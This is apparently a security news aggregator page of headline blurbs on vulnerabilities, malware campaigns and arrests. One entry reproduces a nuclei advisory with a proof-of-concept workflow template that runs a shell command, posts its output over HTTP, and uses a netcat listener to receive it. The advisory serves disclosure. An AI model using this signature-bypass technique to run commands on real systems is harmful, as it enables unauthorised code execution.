Security
Headlines
HeadlinesLatestCVEs

Tag

#auth

SAP AI Core Vulnerabilities Expose Customer Data to Cyber Attacks

Cybersecurity researchers have uncovered security shortcomings in SAP AI Core cloud-based platform for creating and deploying predictive artificial intelligence (AI) workflows that could be exploited to get hold of access tokens and customer data. The five vulnerabilities have been collectively dubbed SAPwned by cloud security firm Wiz. "The vulnerabilities we found could have allowed attackers

The Hacker News
Open in Source
#vulnerability#web#google#microsoft#amazon#git#kubernetes#intel#perl#aws#auth#docker#sap#The Hacker News
Meta Halts AI Use in Brazil Following Data Protection Authority's Ban

Meta has suspended the use of generative artificial intelligence (GenAI) in Brazil after the country's data protection authority issued a preliminary ban objecting to its new privacy policy. The development was first reported by news agency Reuters. The company said it has decided to suspend the tools while it is in talks with Brazil's National Data Protection Authority (ANPD) to address the

Cisco Warns of Critical Flaw Affecting On-Prem Smart Software Manager

Cisco has released patches to address a maximum-severity security flaw impacting Smart Software Manager On-Prem (Cisco SSM On-Prem) that could enable a remote, unauthenticated attacker to change the password of any users, including those belonging to administrative users. The vulnerability, tracked as CVE-2024-20419, carries a CVSS score of 10.0. "This vulnerability is due to improper

Iranian Cyber-Threat Group Drops New Backdoor, 'BugSleep'

The group — which has targeted Israel, Saudi Arabia, and other nations — often uses spear-phishing and legitimate remote management tools but is developing a brand-new homegrown tool set.

Alleged ‘Maniac Murder Cult’ Leader Indicted Over Plot to Kill Jews

US prosecutors have charged Michail Chkhikvishvili, also known as “Commander Butcher,” with a litany of crimes, including alleged attempts to poison Jewish children in NYC.

Threat Actors Ramp Up Use of Encoded URLs to Bypass Secure Email

The tactic is not new, but there has been a steady increase in its use as of this spring.

GHSA-c3q9-c27p-cw9h: projectdiscovery/nuclei allows unsigned code template execution through workflows

### Summary Find a way to execute code template without -code option and signature. ### Details write a `code.yaml`: ```yaml id: code info: name: example code template author: ovi3 code: - engine: - sh - bash source: | id http: - raw: - | POST /re HTTP/1.1 Host: {{Hostname}} {{code_response}} workflows: - matchers: - name: t ``` using nc to listen on 80: ```bash nc -lvvnp 80 ``` execute PoC template with nuclei: ```bash ./nuclei -disable-update-check -w code.yaml -u http://127.0.0.1 -vv -debug ``` and nc will get `id` command output. We use `-w` to specify a workflow file, not `-t` to template file. and notice there is a `workflows` field in code.yaml to pretend to be a workflow file. Test in Linux and Nuclei v3.2.9 ### Impact Some web applications inherit from Nuclei and allow users to edit and execute workflow files. In this case, users can execute arbitrary commands. (Although, as far as I know, most web ...

DPRK Hackers Tweak Malware to Lure MacOS Users into Video Calls

North Korean espionage campaign delivers updated BeaverTail info stealer by spoofing legitimate video calling service, researcher finds.

West African Crime Syndicate Taken Down by Interpol Operation

Law enforcement managed to arrest numerous members of Black Axe, a notorious group engaged in a wide variety of criminal activity.